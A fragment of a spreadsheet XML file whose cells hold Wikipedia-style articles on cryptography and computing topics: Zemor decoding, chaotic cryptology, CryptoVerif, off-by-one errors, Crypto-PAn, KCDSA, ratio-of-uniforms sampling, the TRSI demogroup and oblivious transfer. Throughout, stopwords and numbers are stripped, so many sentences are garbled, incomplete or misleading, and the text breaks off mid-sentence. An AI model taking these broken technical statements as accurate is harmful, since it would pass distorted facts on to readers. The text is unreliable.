transmitted codeword zeros vector. received codeword {\displaystyle edges incorrect value decoding considered. here incorrect value, mean {\displaystyle bits. {\displaystyle w=w^{0}} initial value codeword, {\displaystyle w^{1},w^{2},\ldots ,w^{t}} values first, second {\displaystyle stages decoding. here, {\displaystyle x^{i}={e\in e|x_{e}^{i}=1}} {\displaystyle s^{i}={v\in v^{i}|e_{v}\cap x^{i+1}!=\emptyset here {\displaystyle s^{i}} corresponds vertices able successfully decode codeword {\displaystyle i^{th}} round. from algorithm {\displaystyle s^{1}&lt;s^{0}} number unsuccessful vertices corrected every iteration. prove {\displaystyle s^{0}&gt;s^{1}&gt;s^{2}&gt;\cdots decreasing sequence. fact, {\displaystyle |s_{i+1}|&lt;=({\dfrac {1}{2-\alpha }})|s_{i}|} assuming, {\displaystyle \alpha equation geometric decreasing sequence. {\displaystyle |s_{i}|&lt;n} {\displaystyle log_{2-\alpha rounds necessary. furthermore, {\displaystyle \sum |s_{i}|=n\sum ({\dfrac {1}{(2-\alpha )^{i}}})=o(n)} implement {\displaystyle i^{th}} round {\displaystyle o(|s_{i}|)} time, total sequential running time linear. drawbacks zemor's algorithm lengthy process number iterations {\displaystyle decoder algorithm takes {\displaystyle [(\log {n})/(\log(2-\alpha ))]} zemor's decoding algorithm finds difficult decode erasures. detailed improve algorithm isgiven also expander codes tanner graph linear time encoding decoding error-correcting codes references</t>
  </si>
  <si>
    <t>Chaotic cryptology</t>
  </si>
  <si>
    <t>chaotic cryptology application mathematical chaos theory practice cryptography, study techniques used privately securely transmit information presence third-party adversary. since first investigated robert matthews 1989, chaos cryptography attracted much interest. however, long-standing concerns security implementation speed continue limit implementation.chaotic cryptology consists opposite processes: chaotic cryptography chaotic cryptanalysis. cryptography refers encrypting information secure transmission, whereas cryptanalysis refers decrypting deciphering encoded encrypted messages. order chaos theory efficiently cryptography, chaotic maps implemented entropy generated produce required confusion diffusion. properties chaotic systems cryptographic primitives share unique characteristics allow chaotic systems applied cryptography. chaotic parameters, well cryptographic keys, mapped symmetrically mapped produce acceptable functional outputs, make next impossible adversary find outputs without knowledge initial values. since chaotic maps real life scenario require numbers limited, may, fact, real purpose cryptosystem chaotic behavior predicted. important issues cryptographic primitive security system. however, numerous cases, chaos-based cryptography algorithms proved insecure. main issue many cryptanalyzed algorithms inadequacy chaotic maps implemented system. types chaos-based cryptography divided major groups: symmetric chaos cryptography, secret used sender receiver. asymmetric chaos cryptography, cryptosystem public. some proposed systems broken.the majority chaos-based cryptographic algorithms symmetric. many discrete chaotic maps process. applications image encryption bourbakis alexopoulos 1991 proposed supposedly earliest fully intended digital image encryption scheme based scan language. later emergence chaos-based cryptography hundreds image encryption algorithms, improving security digital images proposed. however, three main aspects design image encryption usually modified different algorithms (chaotic map, application structure algorithm). initial perhaps crucial point chaotic applied design algorithms. speed cryptosystem always important parameter evaluation efficiency cryptography algorithm, therefore, designers initially interested using simple chaotic maps tent map, logistic map. however, 2006 2007, image encryption algorithms based sophisticated chaotic maps proved application chaotic higher dimension could improve quality security cryptosystems. hash function chaotic behavior generate hash functions. random number generation unpredictable behavior chaotic maps used generation random numbers. some earliest chaos-based random number generators tried directly generate random numbers logistic map. references</t>
  </si>
  <si>
    <t>CryptoVerif</t>
  </si>
  <si>
    <t>cryptoverif software tool automatic reasoning security protocols written bruno blanchet. supported cryptographic mechanisms provides mechanism specifying security assumptions cryptographic primitives, handle particular symmetric encryption, message authentication codes, public-key encryption, signatures, hash functions. concrete security cryptoverif claims evaluate probability successful attack protocol relative probability breaking cryptographic primitive, i.e. establish concrete security. references external links official website</t>
  </si>
  <si>
    <t>Off-by-one error</t>
  </si>
  <si>
    <t>off-by-one error off-by-one (known acronyms oboe, obo, obob) logic error involving discrete equivalent boundary condition. often occurs computer programming iterative loop iterates time many few. this problem could arise programmer makes mistakes using less equal less than" used comparison, fails take account sequence starts zero rather array indices many languages). this also occur mathematical context. cases looping arrays consider array items, items (inclusive) processed. many items there? intuitive answer one, exhibiting fencepost error; correct answer reason, ranges computing often represented half-open intervals; range (inclusive) represented range (inclusive) (exclusive) avoid fencepost errors. example, loop iterates five times (from inclusive) written half-open interval loop body executed first index equal index becomes finally successive iterations. point, index becomes index false loop ends. however, comparison used (less equal to), loop would carried times: index takes values likewise, index initialized rather would four iterations: index takes values both alternatives cause off-by-one errors. another error occur do-while loop used place loop vice versa.) do-while loop guaranteed least once. array-related confusion also result differences programming languages. numbering common, languages start array numbering pascal arrays user-defined indices. this makes possible model array indices problem domain. fencepost error fencepost error (occasionally called telegraph pole, lamp-post, picket fence error) specific type off-by-one error. early description error appears works vitruvius. following problem illustrates error: build straight fence feet long posts spaced feet apart, many posts need? common answer posts wrong. this response comes dividing length fence spacing apart post, quotient erroneously classified number posts. actuality, fence sections posts. scenario, fence sections posts. conversely, fence contains posts, contain sections. this relationship important consider dealing reverse error. reverse error occurs number posts known number sections assumed same. depending design fence, assumption correct incorrect. following problem demonstrates reverse error: posts, many sections them? interpretation fence's design changes answer problem. correct number sections fence fence free-standing line segment bounded post ends (e.g., fence passageway gaps), fence forms complete, free-standing loop (e.g., enclosure accessible surmounting, boxing ring), posts occur ends line-segment-like fence (e.g., fence wall-anchored buildings). precise problem definition must carefully considered, setup situation give wrong answer situations. fencepost errors come counting things rather spaces them, vice versa, neglecting consider whether count ends row. fencepost errors also occur units length. example, time pyramid, consisting blocks placed 10-year intervals blocks, scheduled take 1,190 years build (not 1,200), installation first block last block. earliest fencepost errors involved time, julian calendar originally calculated leap years incorrectly, counting inclusively rather exclusively, yielding leap year every three years rather every four. "fencepost error" can, rare occasions, refer error induced unexpected regularities input values, (for instance) completely thwart theoretically efficient binary tree hash function implementation. this error involves difference expected worst case behaviours algorithm. larger numbers, often major issue. smaller numbers, however, specific cases accuracy paramount committing off-by-one error disastrous. sometimes issue also repeated and, therefore, worsened, someone passing incorrect calculation following person makes kind mistake course, error might also reversed). example error occur computational language matlab linspace() linear interpolation function, whose parameters (lower value, upper value, number values) (lower value, upper value, number increments). programmer misunderstands third parameter number increments might hope linspace(0,10,5) would achieve sequence instead would 2.5, 7.5, 10]. security implications common off-by-one error results security-related caused misuse standard library strncat routine. common misconception strncat guaranteed null termination write beyond maximum length. reality write terminating null character byte beyond maximum length specified. following code contains bug: off-by-one errors common using library consistent respect whether needs subtract byte functions like fgets() strncpy never write past length given (fgets() subtracts itself, retrieves (length bytes), whereas others, like strncat write past length given them. programmer remember functions need subtract systems (little endian architectures particular) result overwriting least significant byte frame pointer. this cause exploitable condition attacker hijack local variables calling routine. approach often helps avoid problems variants functions calculate much write based total length buffer, rather maximum number characters write. such functions include strlcat strlcpy, often considered "safer" make easier avoid accidentally writing past buffer. code example above, calling strlcat(buf, sizeof(buf)) instead would remove bug.) also boundary-value analysis pigeonhole principle rounding error zero-based numbering references citations sources further reading parker, matt (2021). humble when math goes wrong real world. riverhead books. isbn 978-0593084694.</t>
  </si>
  <si>
    <t>Crypto-PAn</t>
  </si>
  <si>
    <t>crypto-pan (cryptography-based prefix-preserving anonymization) cryptographic algorithm anonymizing addresses preserving subnet structure. that algorithm encrypts string bits {\displaystyle string {\displaystyle e_{k}(x)} ensuring pair bit-strings {\displaystyle x,y} share common prefix length {\displaystyle images {\displaystyle e_{k}(x),e_{k}(y)} also share common prefix length {\displaystyle mapping property called prefix-preserving. way, crypto-pan kind format-preserving encryption. mathematical outline crypto-pan developed jinliang fan, mostafa ammar (all georgia tech) moon. inspired address anonymization done greg minshall's tcpdpriv program circa 1996. algorithm intuitively, crypto-pan encrypts bit-string length {\displaystyle descending binary tree depth {\displaystyle step string. each binary tree's {\displaystyle 2^{n}-1} non-leaf nodes given value "1", according pseudo-random function seeded encryption key. step {\displaystyle descent, algorithm computes {\displaystyle output xoring {\displaystyle input value current node. reference implementation takes 256-bit key. first bits material used initialize aes-128 cipher mode. second bits material encrypted cipher produce 128-bit padding block {\displaystyle {\mathit {pad}}} given 32-bit ipv4 address {\displaystyle reference implementation performs following operation {\displaystyle x_{i}} input: compose 128-bit input block {\displaystyle i_{i}=x_{[0,i)}{\mathit {pad}}_{[i,128)}} encrypt {\displaystyle i_{i}} cipher produce 128-bit output block {\displaystyle o_{i}} finally, {\displaystyle output block {\displaystyle {\displaystyle append result {\displaystyle x_{i}\oplus o_{i,i}} onto output bitstring. once bits output bitstring computed, result returned anonymized output {\displaystyle e_{k}(x)} corresponds original input {\displaystyle reference implementation implement deanonymization; provide function {\displaystyle d_{k}} {\displaystyle d_{k}(e_{k}(x))=x} however, decryption implemented almost identically encryption, making sure compose input block {\displaystyle i_{i}=x_{[0,i)}{\mathit {pad}}_{[i,128)}} using plaintext bits {\displaystyle decrypted far, rather using ciphertext bits: {\displaystyle i_{i}\neq e_{k}(x)_{[0,i)}{\mathit {pad}}_{[i,128)}} reference implementation implement encryption bitstrings lengths example, support anonymization 128-bit ipv6 addresses. practice, 32-bit crypto-pan algorithm used "ecb mode" itself, 128-bit string {\displaystyle x_{[0,128)}} might anonymized {\displaystyle e_{k}(x_{[0,32)})e_{k}(x_{[32,64)})e_{k}(x_{[64,96)})e_{k}(x_{[96,128)})} this approach preserves prefix structure 128-bit string, leak information lower-order chunks; example, anonymized ipv6 address consisting 32-bit ciphertext repeated four times likely special address thus reveals encryption 32-bit plaintext 0000:0000:0000:0000. principle, reference implementation's approach (building 128-bit input blocks {\displaystyle i_{i}} extended bits. beyond bits, different approach would used; fundamental algorithm (descending binary tree whose nodes marked pseudo-random function material) remains valid. implementations crypto-pan's reference implementation written 2002 jinliang fan.in 2005, david stott lucent made improvements reference implementation, including deanonymization routine. stott also observed algorithm preserves prefix structure destroying suffix structure; running crypto-pan algorithm bit-reversed string preserve existing suffix structure destroying prefix structure. thus, running algorithm first input string, bit-reversed output first pass, destroys prefix suffix structure. (however, suffix structure destroyed, destroying remaining prefix structure accomplished efficiently simply feeding non-reversed output aes-128 mode. there particular reason reuse crypto-pan second pass.) perl implementation written 2005 john kristoff. python ruby implementations also exist. versions crypto-pan algorithm used data anonymization many applications, including netsniff caida's coralreef library. references</t>
  </si>
  <si>
    <t>KCDSA</t>
  </si>
  <si>
    <t>kcdsa (korean certificate-based digital signature algorithm) digital signature algorithm created team korea internet security agency (kisa). elgamal variant, similar digital signature algorithm gost 34.10-94. standard algorithm implemented {\displaystyle gf(p)} elliptic curve variant (ec-kcdsa) also specified. kcdsa requires collision-resistant cryptographic hash function produce variable-sized output (from bits, 32-bit increments). has-160, another korean standard, suggested choice. domain parameters {\displaystyle large prime {\displaystyle |p|=512+256i} {\displaystyle i=0,1,\dots {\displaystyle prime factor {\displaystyle p-1} {\displaystyle |q|=128+32j} {\displaystyle j=0,1,\dots {\displaystyle base element order {\displaystyle {\displaystyle \operatorname {gf} (p)} user parameters {\displaystyle signer's private signature {\displaystyle 0&lt;x&lt;q} {\displaystyle signer's public verification computed {\displaystyle y=g^{\bar {x}}{\pmod {p}},} {\displaystyle {\bar {x}}=x^{-1}{\pmod {q}}} {\displaystyle hash-value cert data, i.e., cert data {\displaystyle z=h({\text{cert data}})} .the 1998 spec unclear exact format "cert data". revised spec, defined bottom bits public block size hash function bits (typically 1024). effect first input block corresponds 2^b. {\displaystyle lower bits hash function {\displaystyle collision resistant hash function |q|-bit digests. signing signer randomly picks integer {\displaystyle 0&lt;k&lt;q} computes {\displaystyle w=g^{k}\mod {p}} then computes first part: {\displaystyle r=h(w)} then computes second part: {\displaystyle s=x(k-r\oplus h(z\parallel m)){\pmod {q}}} {\displaystyle s=0} process must repeated start. signature {\displaystyle (r,s)} verifying verifier checks {\displaystyle 0\leq r&lt;2^{|q|}} {\displaystyle 0&lt;s&lt;q} rejects signature invalid not. verifier computes {\displaystyle e=r\oplus h(z\parallel then checks {\displaystyle r=h(y^{s}\cdot g^{e}\mod {p})} external links kcdsa specification analysis</t>
  </si>
  <si>
    <t>Ratio of uniforms</t>
  </si>
  <si>
    <t>ratio uniforms method initially proposed kinderman monahan 1977 pseudo-random number sampling, drawing random samples statistical distribution. like rejection sampling inverse transform sampling, exact simulation method. basic idea method change variables create bounded set, sampled uniformly generate random variables following original distribution. feature method distribution sample required known unknown multiplicative factor, common situation computational statistics statistical physics. motivation convenient technique sample statistical distribution rejection sampling. when probability density function distribution bounded finite support, define bounding around uniform proposal distribution), draw uniform samples return coordinates points fall function (see graph). direct consequence fundamental theorem simulation, returned samples distributed according original distribution. when support distribution infinite, impossible draw rectangular bounding containing graph function. still rejection sampling, non-uniform proposal distribution. delicate choose appropriate proposal distribution, also know efficiently sample proposal distribution. method ratio uniforms offers solution problem, essentially using proposal distribution distribution created ratio uniform random variables. statement statement proof adapted presentation gobet complements rejection sampling {\displaystyle a_{f,r}} statement specify perform uniform sampling {\displaystyle a_{f,r}} however, interest method mild conditions {\displaystyle (namely {\displaystyle f(x_{1},x_{2},\ldots ,x_{d})^{\frac {1}{1+rd}}} {\displaystyle x_{i}f(x_{1},x_{2},\ldots ,x_{d})^{\frac {r}{1+rd}}} {\displaystyle bounded), {\displaystyle a_{f,r}} bounded. define rectangular bounding {\displaystyle {\tilde {a}}_{f,r}} thatthis allows sample uniformly {\displaystyle a_{f,r}} rejection sampling inside {\displaystyle {\tilde {a}}_{f,r}} parameter {\displaystyle adjusted change shape {\displaystyle a_{f,r}} maximize acceptance ratio sampling. parametric description boundary {\displaystyle a_{f,r}} definition {\displaystyle a_{f,r}} already convenient rejection sampling step. illustration purposes, interesting draw set, case useful know parametric description boundary:or common case {\displaystyle 1-dimensional variable, {\displaystyle (u,v)=\left(f(x)^{\frac {1}{1+r}},x\,f(x)^{\frac {r}{1+r}}\right)} generalized ratio uniforms here parameterized {\displaystyle ratio uniforms described general class transformations.in 1-dimensional case, {\displaystyle g:\mathbb ^{+}\rightarrow \mathbb ^{+}} strictly increasing differentiable function {\displaystyle g(0)=0} define {\displaystyle a_{f,g}} {\displaystyle (u,v)} random variable uniformly distributed {\displaystyle a_{f,g}} {\displaystyle {\frac {v}{g'(u)}}} distributed density {\displaystyle examples exponential distribution assume want sample exponential distribution, {\displaystyle p(x)=\lambda \mathrm ^{-\lambda ratio uniforms method. take {\displaystyle r=1} start constructing {\displaystyle a_{f,1}} {\displaystyle a_{f,1}=\left\{(u,v)\in \mathbb ^{2}:0\leq u\leq {\sqrt {p\left({\frac {v}{u}}\right)}}\right\}} condition {\displaystyle 0\leq u\leq {\sqrt {p\left({\frac {v}{u}}\right)}}} equivalent, computation, {\displaystyle 0\leq v\leq -{\frac {u}{\lambda }}\ln {\frac {u^{2}}{\lambda allows plot shape (see graph). this inequality also allows determine rectangular bounding {\displaystyle {\tilde {a}}_{f,1}} {\displaystyle a_{f,1}} included. indeed, {\displaystyle g(u)=-{\frac {u}{\lambda }}\ln {\frac {u^{2}}{\lambda {\displaystyle g\left({\sqrt {\lambda }}\right)=0} {\displaystyle g'\left({\frac {2}{\mathrm {\sqrt {\lambda }}}}\right)=0} {\displaystyle {\tilde {a}}_{f,1}=\left[0,{\sqrt {\lambda }}\right]\times \left[0,{\frac {2}{\mathrm {\sqrt {\lambda }}}}\right]} from here, draw pairs uniform random variables {\displaystyle u\sim \mathrm {unif} \left(0,{\sqrt {\lambda }}\right)} {\displaystyle v\sim \mathrm {unif} \left(0,{\frac {2}{\mathrm {\sqrt {\lambda }}}}\right)} {\displaystyle u\leq {\sqrt {\lambda \,\mathrm ^{-\lambda {\frac {v}{u}}}}}} happens, return {\displaystyle {\frac {v}{u}}} exponentially distributed. mixture normal distributions consider mixture normal distributions {\displaystyle {\mathcal {d}}=0.6\,n(\mu =-1,\sigma =2)+0.4\,n(\mu =3,\sigma =1)} apply method ratio uniforms, given {\displaystyle first determine boundaries rectangular bounding {\displaystyle {\tilde {a}}_{f,r}} enclosing {\displaystyle a_{f,r}} this done numerically, computing minimum maximum {\displaystyle u(x)=f(x)^{\frac {1}{1+r}}} {\displaystyle v(x)=x\,f(x)^{\frac {r}{1+r}}} grid values {\displaystyle then, draw uniform samples {\displaystyle (u,v)\in {\tilde {a}}_{f,r}} keep fall inside {\displaystyle a_{f,r}} return {\displaystyle {\frac {v}{u^{r}}}} possible optimize acceptance ratio adjusting value {\displaystyle seen graphs. software rust runuran contributed packages also rejection sampling inverse transform sampling references</t>
  </si>
  <si>
    <t>Tristar and Red Sector Incorporated</t>
  </si>
  <si>
    <t>tristar sector incorporated (trsi) demogroup formed 1990. came longest-running cooperation scene history. existed 1985, joined later evolving commodore amiga later various game console platforms like playstation, xbox, nintendo set-ups like arduino, android blu-ray, trsi released number digital productions, dedicated experimenting phreaking network alteration. members spread around world still contribute computer scene code years history. history 1985 1987 sector incorporated (rsi) founded focus commodore group cracks, fixes, trainers, packs, intros demos. founders three suppliers canada: bill best, greg kangol kid. after initial formation spring 1985, skeleton baudsurfer rsi's first domain, "the pirates ship" following summer, eventually became "dawn eternity" bbs. year, irata mister zeropage asked join group european section germany, irata group's main trader, followed additional importers united states. slogans time included risk, sector number one" "red sector leading force". light circle basis several future european members rsi, coalition radwar enterprises, cracking force berlin flash cracking formation. sector incorporated first released amiga 1000 1986. during summer, decided concentrate amiga formed amiga division. beginning 1987, sector's commodore section became dormant, bundle forces amiga. time, rsi's first amiga demo coded released scene. followed second, "twilight music" karsten obarski. year, short-term cooperation formed ghenna defjam, marking first group cooperation amiga. 1988 1989 now, active members moved amiga. fast stream imports united states canada continued processed europe. among wave police raids, irata mister zeropage busted fell asleep period time. slow restart irata, onyx began recovery sector incorporated second half year, onyx came know design. first time, tristar members party together. defjam restarted releasing together. later irata became main leader group. slogan time: "rsi voice underground". 1989, sector incorporated recruited clumsy creepers demo division amiga. filemagazine "news tour" first issue august, written rsi. september, "red sector mega demo" published ecs, milestone scene demo history instant classic, manufactured 3½-inch disc production, winning "tristar party" demo competition. later voted best amiga demos ever. among others: coding design, doctor beat, delta. music romeo knight, scs, mark arts. graphics scum, dark, doctor sign, delta. demo division also released "the sector demomaker" amiga, distributed data becker. 1990 1992 group public enemy founded. sector incorporated public enemy joined forces extended february, published first issue "criminal" magazine. voted number "world charts" amiga. amiga demo "follow released ecs, followed "revenge babbnasen" format. cebit demo competition march. amiga, relatively unknown group combined become tristar sector incorporated, short form: trsi, june this beginning longest running merger scene history today, finalized "the silents sector summer conference" denmark. from there, trsi became vital crew scene history, diverting activities several playgrounds. slogans time: "twice double trouble" "back roots" brief period, multi-platform cooperation effect: public enemy/tristar sector incorporated/defjam/the dream team. public enemy left coalition, followed dream team, 1991. tristar sector incorporated remained still consists predominantly european members germany, austria, france england. trsi spawned austrian amiga demo section surprise productions, founded tmb, soon partially left again. december, "prism vectors" demo ranked third "prime party" amiga. slogans time: "the sleeping gods" "the everlasting" march 1992, trsi "misery dentro" cebit demo competition amiga. after previously abandoned, commodore section revived irata, mister president mister cursor august, featuring psychobilly, benson, dense, termo street tuff. trsi spawned another demo division, called masque. their amiga demo wicked sensation wayne mendoza, jay, peachy romeo knight world commodore exhibition november. ecliptica romeo knight, hellrazor, fade one, double trouble, viola bros. spider, done danish division, ranked third december "the party" amiga. 1993 1999 voted best first release group commodore april, pain, gain came second amiga "the gathering". masque also ranked second misery dentro cebit demo competition amiga, crafted peachy, virgill, dreamer wayne mendoza. meanwhile, trsi formed polish demo section. tristar sector incorporated published several noteworthy demos, among "cubic dream", "artifice" "victoria". groups overall production activities peaked early 1994. number releases produced cooperation zenith. slogan time: fame, money, power friendship" commodore "the party scroll" demo shipped. last issue papermag "bullet proof" released release editor "dense", left ecene. fiver2 published "honeycomb" slideshow. polish demo section trsi formed nah-kolor middle 1995. shortly after, dissected tristar sector incorporated, members staying. zinkfloid founded trsi recordz publish scene music samplers "cyberlogik" plus album cncd. trsi also released snes super famicom. game soundtrack album doctor awesome published trsi recordz 1996. "television" demo ranked second april "scenest" commodore december, "twin peaks" came fourth amiga "the party", sporting soundtrack virgill. finnish crew mellow chips joined tristar sector incorporated group demo section 1997. trsi recordz published album andrew barnabas. july, trsi locker house released "insomnia" issue one, amiga disc magazine. "dose" mellow chips ranked second october combined amiga demo "demolition party". mellow chips tristar sector incorporated demo competition "the gathering" amiga production "rise" 1998. trsi light circle released nintendo october, "ekg" came second "compushare" replay. trsi recordz published album muffler 1999. "spice melange" "bush party" june demo competition polar dreams. 2000 2007 tristar sector incorporated, millennium, released playstation game color. "trsac party", trsi ranked second bizarre love triangle amiga, haujobb depth october 2001. 2003 members left coalition revive again, stop remaining formation produce up-to-date titles. tristar sector incorporated released game advance. trsi published first ever realtime tracer august 2004, raytrace all" hitchhikr. together hoodlum paradox, "hoodlum cracktro" released widely acknowledged november. april 2005 "mini" "maximum overdose" party trsi combined demo commodore tristar sector incorporated produced 2006. "animatron" came third commodore breakpoint demo competition april. console demo section, "bloody memories" ranked fourth titan psp. "maximum overdose" may, "rohrschach" combined demo commodore trsi. evoke took place august, third place scored titan "lick psp. april 2007, tristar sector incorporated released firstie xbox bloody memories 2.01, combined demo sample game, great giana sisters, ranking fourth wild demo competition "breakpoint", produced 71m, ayatollah, mike, shazz, spotter, h2o, wodk rebb. ghost machine took crown maximum overdose combined demo may, done street tuff, peiselulli, linus, titus rabenauge, cadaver spotter. trick pony intro scored first demo sundown september. trsi's wannabe demo main party wild demo competition november. astaroth rejoined trsi flash demo called back2black evoke. 2008 2009 february, 2008 odyssey street tuff, benson, peiselulli, linus, spotter oxyron demo competition trsi, including modplayer speech emulation. element ranked third breakpoint animation competition april, done h2o, daxx, teis, core dicab. addition, slideshow released ayatollah, mike, h2o, 71m, spotter syphus, later converted pasy, pontscho, chromag h2o. tristar sector incorporated published kernel demos peiselulli dtv, plus classic game boulder dash source code platform. sundown invitation 71m, h2o, teis dicab spotter personal computer widely well received july, together bitfellas scene allstars. trsi reached third place live coded flash demo august evoke called back2red. october, candy 71m, chromag placed first main 2008 wild demo. "numerica artparty" competition march 2009 tristar sector incorporated. parallel, "t2" cracktro genesis released. april, "fortress narzod" peiselulli, linus, benson street tuff secured second place game competition breakpoint, cube" third wild demo conjunction drifters calodox plus extra help spotter santa. handmade graphic "the sleeping gods" came fourth, penciled spotter. tracking music competitions evoke august brought second respectively third place group, "buenzli", joined venture drifters/trsi/calodox second prize demo "laseriter". demo "caulifire" collected third slot "function" september. early october trsi contributing "main" party france, including popular invitro conjunction alcatraz rebels cooperation "hil", scored fourth combined production misery first wild demo, private spacetrip" seven ranked second huge screen locations rooftop "i'm free" teis came third music competition. december, "tmdc twelve" party witnessed first place textmode demo compofiller, crafted teis hardy. ultimate meeting, tristar sector incorporated compo l4kuna, hardy teis. 2010 2011 april last "breakpoint" second place peiselulli's game spike, help linus, benson, streetuff yazoo. spotter released para'n'droid cooperation bodo rabenauge, eyebex brain control music ralf wadephul, first real interactive touch-screen, motion-sensor live video feed demo google's android mobile phone platform. after presenting final version "para'n'droid" droidcon berlin irata, 3sat first postet final video net. honor school scene spirit, complete source code also made public, push development android platforms! june 2010 brought place party" freestyle music competition group. trsi twenty years old, still alive kicking! claim tristar sector incorporated's anniversary year said: "trsi believe". august, teis tiny tracking music competition "evoke", hardy's intro "large hedron collider" captured second place. hardy's amster-damn cancer cube ranked third "main" october, parallel third place screen compo "wicked huge sensation". finally, "happy year" rebels trsi settled second slot "tum" december. "revision" party april 2011 witnessed birth critically acclaimed music disc called trsi elektroshock never stop chip rock produced spotter, help 71m, sal-one, irata others, retrospective years underground sound, including tracks razor 1911, fairlight, various trsi members plus many artists renowned voice actors. also, teis secured second place executable school music compo. july 2011, cons came "sommarhack" music competition. early august witnessed rebb's second places "assembly's" fast extreme music competition, street tuff's signal" captured third place "evoke" wild compo, one-filer, including calligraphy logo spotter. "demodays party", formerly known "buenzli", later 2011 success trsi, adding first place wodk graphics competition, third place cons teis featuring streettuff music competition and, collaboration h2o, another first slot wild competition krawall(brause). october, third place added list cons' track "trsac" exemusic competition. concluding year 2011, hardy teis combined compo "the ultimate meeting" trsi tunnel angst. 2012 second installment "revision" easter weekend april important releases group. school demo compo, tristar sector incorporated's 8-bit crew ranked 2nd, street tuff's last release, counting multi-parts, featuring benson, peiselulli, stainless steel titus: krawall deluxe expanding all-time record five world first releases hardware platforms consecutive years, trsi console division presented funky fresh, realtime blu-ray interactive production, running ps3, stand alone boxes soft players. this place wild compo done luis, forcer battlecommand, produced spotter, included help wodk alien, idea cited bodo. support development, full source code published. slogan time: "secondly first things first". week later, "pixel jam" party cleveland brought place freestyle graphics trsi's forcer, followed place cons competition. still back back april, forcer struck silver medal "inercia demoparty" "deja graphics compo secured competition winning first slot bitmap graphics event "master aviation". party, wodk's "fly vip" raytraced graphics compo. june, titan, trsi spire records place competition coop invitro nordlicht, presented "flashback" sporting graphics forcer. later month, trsi desire overhead projector compo party" mega demo 9000, engineered luis, soundtrack cons, forcer crowned freestyle graphics slot. july brought "nordlicht" party high-score: forcer cons place graphics compo, virgill cons secured second photo competition vampires empire runner demo compo dtv, peiselulli, streetuff, forcer, zabu plus aegis. august's "evoke" cologne handed gold medal hardy virgill zuckz competition. september, "demodays" party forcer place wodk graphics compo, followed slot cons "sundown" school graphics discipline. "main" party october brought place combined intro category hardy virgill gangnam. montreal hosted "recursion" party november, trsi first prizes graphics, demo compo chalcogens coop desire quebarium, plus wild demo slot metal skin slidetro forcer, luis, romeo knight kepler spotter. also, official .nfo file ascii released. 2013 february xerxes winning scenesat radio remix year award best newcomer version "ba1", released "trsi elektroshock", vinyl edition. celebrating this, digital mastering version "trsi elektroshock" published march, refreshed playlist. days easter weekend, elko color logo compo csdb digital playground. april, third "revision" party streetuff winning school intro compo 4krawall. wild, trsi svatg third "jupiter beyond", followed space madness luis spotter, help elko, subi, wertstahl, kompositkrut, meitikos, alien^pdx, arduino mega game arduino. modern graphics forcer "double trouble", combination prince. cooperation trsi cherry darling third place games "october games". "nordlicht" party july, places cooperation crest), two, three five trsi oldschool demo compo. "evoke" cologne second prize kologne koder kolorz hardy hard, followed third slot elko pixeled pics "healthy meals summer days" runner freestyle graphics prince. references bibliography tamas polgar. 2005. freax brief history computer demoscene. verlag. pages 107, 140, 155. tamas polgar. 2006. freax album. verlag. pages 125, 153, 154, 157. denis moschitto evrim sen. 2007. hackerland logfile scene. social media verlag. glossar. external links official website trsi official website trsi pouet trsi csdb trsi scenery amiga trsi cracktros defacto2 trsi file information repository defacto2 trsi selected school files scene. trsi recordz discography amiga music preservation trsi amiga musicians sector incorporated megademo rom4.lha article mop. r.o.m. diskmag, issue (requires amiga amiga emulator, uae) trsi history 1998</t>
  </si>
  <si>
    <t>Oblivious transfer</t>
  </si>
  <si>
    <t>cryptography, oblivious transfer (ot) protocol type protocol sender transfers potentially many pieces information receiver, remains oblivious piece any) transferred. first form oblivious transfer introduced 1981 michael rabin.1 form, sender sends message receiver probability 1/2, sender remains oblivious whether receiver received message. rabin's oblivious transfer scheme based cryptosystem. useful form oblivious transfer called oblivious transfer oblivious transfer", developed later shimon even, oded goldreich, abraham lempel,2 order build protocols secure multiparty computation. generalized oblivious transfer" user gets exactly database element without server getting know element queried, without user knowing anything elements retrieved. latter notion oblivious transfer strengthening private information retrieval, database kept private. claude crépeau showed rabin's oblivious transfer equivalent oblivious transfer.3further work revealed oblivious transfer fundamental important problem cryptography. considered critical problems field, importance applications built based particular, complete secure multiparty computation: given implementation oblivious transfer possible securely evaluate polynomial time computable function without additional primitive.4 rabin's oblivious transfer protocol rabin's oblivious transfer protocol, sender generates public modulus n=pq large prime numbers, exponent relatively prime λ(n) 1)(q sender encrypts message sender sends receiver. receiver picks random modulo sends sender. note gcd(x,n) overwhelming probability, ensures square roots sender finds square root sends receiver.if receiver finds neither modulo receiver able factor therefore decrypt recover (see rabin encryption details). however, receiver information beyond encryption since every quadratic residue modulo four square roots, probability receiver learns 1/2. oblivious transfer oblivious transfer protocol, alice sender messages wants ensure receiver learns one. bob, receiver, wishes receive without alice learning protocol even, goldreich, lempel (which authors attribute partially silvio micali) general, instantiated using encryption follows. alice messages, {\displaystyle m_{0},m_{1}} wants send exactly bob. want alice know receives. alice generates pair, comprising modulus {\displaystyle public exponent {\displaystyle private exponent {\displaystyle also generates random values, {\displaystyle x_{0},x_{1}} sends along public modulus exponent. picks {\displaystyle either selects {\displaystyle x_{b}} generates random value {\displaystyle uses blind {\displaystyle x_{b}} computing {\displaystyle v=(x_{b}+k^{e})\mod sends alice. alice combines {\displaystyle random values produce: {\displaystyle k_{0}=(v-x_{0})^{d}\mod {\displaystyle k_{1}=(v-x_{1})^{d}\mod {\displaystyle k_{b}} equal {\displaystyle meaningless random value. however since alice know value {\displaystyle chose, cannot determine {\displaystyle k_{0}} {\displaystyle k_{1}} equal {\displaystyle combines secret messages possible keys, {\displaystyle m'_{0}=m_{0}+k_{0}} {\displaystyle m'_{1}=m_{1}+k_{1}} sends bob. knows {\displaystyle able compute {\displaystyle m_{b}=m'_{b}-k} however, since know {\displaystyle cannot compute {\displaystyle k_{1-b}=(v-x_{1-b})^{d}\mod cannot determine {\displaystyle m_{1-b}} 1-out-of-n oblivious transfer k-out-of-n oblivious transfer 1-out-of-n oblivious transfer protocol defined natural generalization 1-out-of-2 oblivious transfer protocol. specifically, sender messages, receiver index receiver wishes receive i-th among sender's messages, without sender learning sender wants ensure receiver receive messages. 1-out-of-n oblivious transfer incomparable private information retrieval (pir). hand, 1-out-of-n oblivious transfer imposes additional privacy requirement database: namely, receiver learn database entries. hand, requires communication sublinear whereas 1-out-of-n oblivious transfer requirement. however, assuming single server sufficient assumption order construct 1-out-of-2 oblivious transfer 1-out-of-n oblivious transfer protocol sublinear communication first constructed generalization single-server pir) eyal kushilevitz rafail ostrovsky more efficient constructions proposed moni naor benny pinkas,10 william aiello, yuval ishai omer reingold,11 sven laur helger lipmaa.12. 2017, kolesnikov al.,13 proposed efficient oblivious transfer protocol 